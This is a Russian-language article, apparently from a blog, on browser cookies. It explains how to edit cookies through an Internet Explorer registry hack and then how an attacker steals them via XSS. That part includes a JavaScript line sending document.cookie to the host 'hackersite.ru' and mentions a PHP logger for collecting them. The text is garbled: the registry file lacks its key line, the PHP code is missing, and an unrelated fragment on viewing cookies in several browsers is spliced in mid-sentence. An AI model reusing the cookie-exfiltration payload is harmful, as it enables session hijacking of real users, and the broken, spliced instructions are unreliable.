Существует механизм, позволяющий http-серверу сохранять на компьютере пользователя некоторую текстовую информацию, а потом к ней обращаться. Данная информация называется cookie. По сути, каждая cookie - это пара: название параметра и его значение. Также каждой cookie присваивается домен, к которому она относится. В целях безопасности во всех браузерах http-серверу позволено лишь обращаться к cookie своего домена. Дополнительно cookie может иметь дату истечения, тогда они будут хранится на компьютере до этой даты, даже если закрыть все окна браузера.

Почему cookie важны?

Во всех многопользовательских системах cookie используются для идентификации пользователя. Вернее, текущего соединения пользователя с сервисом, пользовательской сессии. Если кто-то узнает Ваши cookie, то сможет зайти в систему от Вашего имени. Потому, что в настоящий момент очень мало интернет-ресурсов проверяет смену IP-адреса в течении одной пользовательской сессии.

Как изменить или подменить cookie?

Разработчики браузеров не предоставляют встроенных средств для редактирования cookie. Но можно обойтись и обычным блокнотом (notepad).

Шаг 1: создаем текстовый файл с текстом

Windows Registry Editor Version 5.00



@="C:\\IE_ext.htm"

Сохраняем его под именем IE_ext.reg

Шаг 2: С помощью созданного файла добавляем изменения в реестр Windows.

Шаг 3: создаем текстовый файл с текстом

< script language ="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru" ;
alert(external.menuArguments.document.cookie);

Сохраняем его под именем C:\IE_ext.htm

Шаг 4: Заходим на интересующий нас интернет-сайт.

Шаг 5: Правой кнопкой мыши кликам на свободном месте странице и выбираем пункт меню «Работа с Cookies» . Разрешаем доступ к буферу обмена. В буфер обмена попадут Ваши cookie данного сайт. Можете вставить их блокнот (notepad) и посмотреть.

Шаг 6: Для изменения некоторого cookie редактируем файл C:\IE_ext.htm, заменяя testname на имя cookie, testvalue - на его значение, testdomain.ru – на домен сайта. При необходимости добавляем еще подобные строчки. Для удобства контроля я добавил в скрипт вывод текущих cookie до и после изменения: alert(external.menuArguments.document.cookie);

Шаг 7: Выполняем еще раз Шаг 5, а потом обновляем страницу.

Итог: мы зайдем на данный интернет-ресурс с обновленными cookie.

Как украсть cookie с помощью JavaScript?

Если злоумышленнику удалось найти возможность выполнить произвольный JavaScript-скрипт на компьютере жертвы, то прочитать текущие cookie он может очень легко. Пример:

var str= document.cookie;

Но сможет ли он их передать на свой сайт, ведь, как я указывал ранее, JavaScript-скрипт не сможет без дополнительного подтверждения обратиться к сайту, находящемуся в другом домене? Оказывается, JavaScript-скрипт может загрузить любую картинку, находящуюся на любом http-сервере. При этом передать любую текстовую информацию в запросе на загрузку этой картинке. Пример: http://hackersite.ru/xss.jpg?text_info Поэтому если выполнить такой код:

var img=new Image();

img.src="http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);

то cookie окажутся в запросе на загрузку «картинки» и «уйдут» к злоумышленнику.

Как обрабатывать такие запросы на загрузку «картинки»?

Злоумышленнику нужно лишь найти хостинг с поддержкой php и разместить там код подобный такому:

Тогда все параметры запросов к этому скрипту будут сохраняться в файле log.txt . Осталось лишь в ранее описанном JavaScript-скрипте заменить http://hackersite.ru/xss.jpg на путь к данному php-скрипту.

Итог

Я показал лишь самый простой способ использования XSS-уязвимостей. Но это доказывает, что наличие хотя бы одной такой уязвимостей на многопользовательском интернет-сайте может позволяет злоумышленнику пользоваться его ресурсами от Вашего имени.

Opera раскройте главное меню, перейдите в секцию «Настройки» и выберите строку «Общие настройки...». А можете просто нажать горячие клавиши CTRL + F12. Так вы откроете окно настроек браузера, где на вкладке «Расширенные» нужно щелкнуть раздел «Cookies» в левой панели. В нем вам нужно щелкнуть кнопку «Управление Cookies».

В Mozilla FireFox откройте в меню раздел «Инструменты» и выберите пункт «Настройки». В окне настроек вам надо перейти на вкладку «Приватность», найти там кнопку с надписью «Показать Cookies…» и щелкнуть ее для доступа к списку хранимых браузером кук. Здесь их можно искать и просматривать.

В обозревателе Internet Explorer раскройте раздел «Сервис» в меню и выберите пункт «Свойства ». В окне настройки свойств перейдите на вкладку «Общие» и щелкните кнопку «Параметры» в секции «История просмотра». Таким способом вы откроете еще одно окно («Параметры временных файлов»), в котором надо нажать кнопку «Показать файлы».

Щелкните заголовок «Имя» в открывшемся списке содержимого папки хранения временных файлов Internet Explorer - таким способом вы сможете сгруппировать все файлы кук в один блок в общей куче разнородных файлов. Здесь можно найти интересующий файл и открыть его в стандартном Блокноте для просмотра или редактирования.

В Google Chrome щелкните в верхнем правом углу окна иконку с изображением гаечного ключа и выберите строку «Параметры» в меню. Браузер откроет страницу «Настройки», а вы кликните ссылку «Расширенные» в ее левой панели и на странице расширенных настроек щелкните кнопку «Настройки содержания». Это еще не последняя страница на пути к кукам, хранимым этим браузером.

Нажмите кнопку «Все файлы cookie и данные сайтов» на следующей странице и вы, наконец, получите доступ к списку кук.

В Google Chrome предусмотрены возможности поиска, просмотра и удаления кук.

В браузере Safari щелкните иконку с изображением шестеренки в правом верхнем углу и выберите строку «Настройки…». В окне изменения установок вам нужно перейти на закладку «Безопасность», чтобы нажать там кнопку «Показать Cookies». В Safari предусмотрены только функции поиска и удаления кук, содержимое этих временных файлов здесь можно увидеть только частично.